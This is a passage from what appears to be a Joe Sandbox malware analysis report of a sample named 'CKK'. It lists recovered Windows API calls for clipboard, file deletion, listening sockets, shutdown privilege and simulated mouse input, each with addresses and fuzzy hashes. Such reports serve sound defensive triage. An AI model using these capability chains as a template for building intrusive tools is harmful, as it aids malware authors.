                                                                                              • GlobalLock.KERNEL32 ref: 00A6EC55
                                                                                              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A6EC77
                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A6EC94
                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A6ECD2
                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00A6ECF3
                                                                                              • CountClipboardFormats.USER32 ref: 00A6ED14
                                                                                              • CloseClipboard.USER32 ref: 00A6ED59
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                              • String ID:
                                                                                              • API String ID: 420908878-0
                                                                                              • Opcode ID: 6c8b374483d3b3a245b7f183f11a2063a3f2225b73af604501254de770c23767
                                                                                              • Instruction ID: 69c4d2b10b8c41e69f7fcbc402fe0cf333c20db8751e573fed37f6bf3cd4b47f
                                                                                              • Opcode Fuzzy Hash: 6c8b374483d3b3a245b7f183f11a2063a3f2225b73af604501254de770c23767
                                                                                              • Instruction Fuzzy Hash: 6861CF38204305AFD300EF64D888F7A7BF8AF84764F148529F556972A2DB71DD46CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A669BE
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A66A12
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A66A4E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A66A75
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A66AB2
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A66ADF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                              • API String ID: 3830820486-3289030164
                                                                                              • Opcode ID: 58546726b9c22a57f09ea0415bf42593d6aaaf8136046746f6925f7668c0dae9
                                                                                              • Instruction ID: f4e624caf745f52821edfe642b919e0af31999f677126e9d2dcb8f5bde417f0f
                                                                                              • Opcode Fuzzy Hash: 58546726b9c22a57f09ea0415bf42593d6aaaf8136046746f6925f7668c0dae9
                                                                                              • Instruction Fuzzy Hash: 62D15EB2508304AFC310EBA4C991EBBB7FCAF98704F04491DF689D6191EB74DA44CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00A69663
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00A696A1
                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00A696BB
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00A696D3
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A696DE
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00A696FA
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A6974A
                                                                                              • SetCurrentDirectoryW.KERNEL32(00AB6B7C), ref: 00A69768
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A69772
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A6977F
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A6978F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1409584000-438819550
                                                                                              • Opcode ID: d7d5b165b690b24822ce9cefeb6c1fb140da07e96951c1c9d18b7f0daeb20416
                                                                                              • Instruction ID: 45387b20a74f88e30100d68113c2f221c4cda9ddb59ccededebd3a80278284a4
                                                                                              • Opcode Fuzzy Hash: d7d5b165b690b24822ce9cefeb6c1fb140da07e96951c1c9d18b7f0daeb20416
                                                                                              • Instruction Fuzzy Hash: 4E31A032940619BADF14EFF4ED49AEF77BCAF49320F104565E815E2091EB34D9858F24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00A697BE
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00A69819
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A69824
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00A69840
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A69890
                                                                                              • SetCurrentDirectoryW.KERNEL32(00AB6B7C), ref: 00A698AE
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A698B8
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A698C5
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A698D5
                                                                                                • Part of subcall function 00A5DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A5DB00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                              • String ID: *.*
                                                                                              • API String ID: 2640511053-438819550
                                                                                              • Opcode ID: e2e07ed7bbd1b7eafacafc94c56d4f02176e09382a8011ed16c1abb9fd54779f
                                                                                              • Instruction ID: 3ed5e6bd1df1c4ac569c79dbcca90a3b35f2ad9499a5792258d0a425dc13f374
                                                                                              • Opcode Fuzzy Hash: e2e07ed7bbd1b7eafacafc94c56d4f02176e09382a8011ed16c1abb9fd54779f
                                                                                              • Instruction Fuzzy Hash: 84319032940619BADB10EFB4EC48ADF77BCAF4A320F144555E814A3191EB34DA85CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F3A97,?,?,009F2E7F,?,?,?,00000000), ref: 009F3AC2
                                                                                                • Part of subcall function 00A5E199: GetFileAttributesW.KERNEL32(?,00A5CF95), ref: 00A5E19A
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A5D122
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00A5D1DD
                                                                                              • MoveFileW.KERNEL32 ref: 00A5D1F0
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A5D20D
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A5D237
                                                                                                • Part of subcall function 00A5D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008), ref: 00A5D2B2
                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00A5D253
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A5D264
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 1946585618-1173974218
                                                                                              • Opcode ID: 5bad2299709a6723e71448bebd00af08ec72102c06607213de74b05a7a7f3784
                                                                                              • Instruction ID: 42e36541c37130335b1ccb48af1e177526a34102d4b5667c588ee8fe9e5250e4
                                                                                              • Opcode Fuzzy Hash: 5bad2299709a6723e71448bebd00af08ec72102c06607213de74b05a7a7f3784
                                                                                              • Instruction Fuzzy Hash: 0D615B7180110DAECF15EBE0DA92AFDB7B5BF55341F208169E90677191EB30AF09CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1737998785-0
                                                                                              • Opcode ID: b51a67bebc92dc8a330529bc25a6c7a8b838933486b6075698d1d3af92198379
                                                                                              • Instruction ID: 9e251633ce1124f6719011a2e59c7111619471a9c987306ab7f10fa5c09fe988
                                                                                              • Opcode Fuzzy Hash: b51a67bebc92dc8a330529bc25a6c7a8b838933486b6075698d1d3af92198379
                                                                                              • Instruction Fuzzy Hash: 9F418E39204611AFE710DF55D888F69BBF5EF44328F14C0A9E4158B6A2D736EC42CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5170D
                                                                                                • Part of subcall function 00A516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A5173A
                                                                                                • Part of subcall function 00A516C3: GetLastError.KERNEL32 ref: 00A5174A
                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00A5E932
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                              • String ID: $ $@$SeShutdownPrivilege
                                                                                              • API String ID: 2234035333-3163812486
                                                                                              • Opcode ID: b432a001864d7ad008a9c6bd9fd2143f96752fa8f7e16dd65c935d2141354c31
                                                                                              • Instruction ID: 6b68c8b7b2cac1854c5ca88ed4982cf75ad291c22b7e691794e0e308e9c87e30
                                                                                              • Opcode Fuzzy Hash: b432a001864d7ad008a9c6bd9fd2143f96752fa8f7e16dd65c935d2141354c31
                                                                                              • Instruction Fuzzy Hash: 8201FE72A10211EFEB58A7B4AC86FBFB26CBB14752F150422FC13E21D2D5745D4886A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A71276
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A71283
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00A712BA
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A712C5
                                                                                              • closesocket.WSOCK32(00000000), ref: 00A712F4
                                                                                              • listen.WSOCK32(00000000,00000005), ref: 00A71303
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A7130D
                                                                                              • closesocket.WSOCK32(00000000), ref: 00A7133C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                              • String ID:
                                                                                              • API String ID: 540024437-0
                                                                                              • Opcode ID: b414eacacee8df57f650fad82b4471f493aba67ee7f65b383b3e7b88a2697e9d
                                                                                              • Instruction ID: bad6ad6b13296f8269af6c8a339b9c4d7117e98953af63275dc3546babe9e466
                                                                                              • Opcode Fuzzy Hash: b414eacacee8df57f650fad82b4471f493aba67ee7f65b383b3e7b88a2697e9d
                                                                                              • Instruction Fuzzy Hash: 2B4186316001009FD710DF68C884B69B7E5BF86328F18C198E95A9F293C771ED86CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2
                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A09A4E
                                                                                              • GetSysColor.USER32 ref: 00A09B23
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00A09B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$LongProcWindow
                                                                                              • String ID: 6ofs
                                                                                              • API String ID: 3131106179-1294211291
                                                                                              • Opcode ID: cff79f149e790da2a0a26fa535a292ce95fa0d791b55e48472c14f3216c2196a
                                                                                              • Instruction ID: 34df0467b1220a1a5d90c2d7df346d462adf1fbcf33f744514eee645f8be811e
                                                                                              • Opcode Fuzzy Hash: cff79f149e790da2a0a26fa535a292ce95fa0d791b55e48472c14f3216c2196a
                                                                                              • Instruction Fuzzy Hash: 84A1F770309488AEE728AB2CAD98E7F3AADDB86390B154109F512D65D3CB259D02D376
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A2B9D4
                                                                                              • _free.LIBCMT ref: 00A2B9F8
                                                                                              • _free.LIBCMT ref: 00A2BB7F
                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A93700), ref: 00A2BB91
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00AC121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A2BC09
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00AC1270,000000FF,?,0000003F,00000000,?), ref: 00A2BC36
                                                                                              • _free.LIBCMT ref: 00A2BD4B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                              • String ID:
                                                                                              • API String ID: 314583886-0
                                                                                              • Opcode ID: c0e2b9bf9d19b37025a8e6fe8fe190d95b33e2aee30311722117e2a166859b76
                                                                                              • Instruction ID: 473d499039a074bee6312f231475f05682b7f0c8e849024b65c9fdf7cc89bf57
                                                                                              • Opcode Fuzzy Hash: c0e2b9bf9d19b37025a8e6fe8fe190d95b33e2aee30311722117e2a166859b76
                                                                                              • Instruction Fuzzy Hash: 30C12975A14225AFCB10DF6CAD41BEABBB8EF46350F14417AE491DB252E7309E418770
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F3A97,?,?,009F2E7F,?,?,?,00000000), ref: 009F3AC2
                                                                                                • Part of subcall function 00A5E199: GetFileAttributesW.KERNEL32(?,00A5CF95), ref: 00A5E19A
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A5D420
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A5D470
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A5D481
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A5D498
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A5D4A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2649000838-1173974218
                                                                                              • Opcode ID: 42b7c4d23cfd66499cdf35d42481854150e58453b6c79618993497168c46b2ab
                                                                                              • Instruction ID: 8ece1e6a3648b1af6a44e050ecefdb1cb74a09449f468952714e67f380c4e115
                                                                                              • Opcode Fuzzy Hash: 42b7c4d23cfd66499cdf35d42481854150e58453b6c79618993497168c46b2ab
                                                                                              • Instruction Fuzzy Hash: 8F318971008349AFC210EF64D891ABFB7F8BE91355F404A2DF9D592191EB30AA0D8B62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: d0dc48b9f8f81b75b338b77a7f3f52145fe6ad674d65fdeb1cf9994c78790912
                                                                                              • Instruction ID: f9d45dabf7253ea24a824833f57759dfa0e27a1eb761bb2364eb81a8c44de0e4
                                                                                              • Opcode Fuzzy Hash: d0dc48b9f8f81b75b338b77a7f3f52145fe6ad674d65fdeb1cf9994c78790912
                                                                                              • Instruction Fuzzy Hash: A1C21772E086288FDB25CF28AD407EAB7B5EB49305F1541FAD84DE7240E775AE818F40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A664DC
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A66639
                                                                                              • CoCreateInstance.OLE32(00A8FCF8,00000000,00000001,00A8FB68,?), ref: 00A66650
                                                                                              • CoUninitialize.OLE32 ref: 00A668D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 886957087-24824748
                                                                                              • Opcode ID: cead2abb92336f5de0e65b52793e7f86757e2d7c1f5543a2da7a225c490df049
                                                                                              • Instruction ID: 40bb0c573d26ce185e9a3606dacc1f2cddaf29c27e4b6de0157828ffeb5a363f
                                                                                              • Opcode Fuzzy Hash: cead2abb92336f5de0e65b52793e7f86757e2d7c1f5543a2da7a225c490df049
                                                                                              • Instruction Fuzzy Hash: D6D13871508305AFC314EF24C981A6BB7E8FFD8704F14496DF5968B2A1EB70E905CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 00A722E8
                                                                                                • Part of subcall function 00A6E4EC: GetWindowRect.USER32(?,?), ref: 00A6E504
                                                                                              • GetDesktopWindow.USER32 ref: 00A72312
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A72319
                                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A72355
                                                                                              • GetCursorPos.USER32(?), ref: 00A72381
                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A723DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2387181109-0
                                                                                              • Opcode ID: 4a8157ddc076ac2885e8765b0b63cc6241c5ede49012ae3d2c73b0890b34b8fe
                                                                                              • Instruction ID: 82d1174c3c9390f282026440e6c05555646ecc18afa9da0648e2c50dd71fd007
                                                                                              • Opcode Fuzzy Hash: 4a8157ddc076ac2885e8765b0b63cc6241c5ede49012ae3d2c73b0890b34b8fe
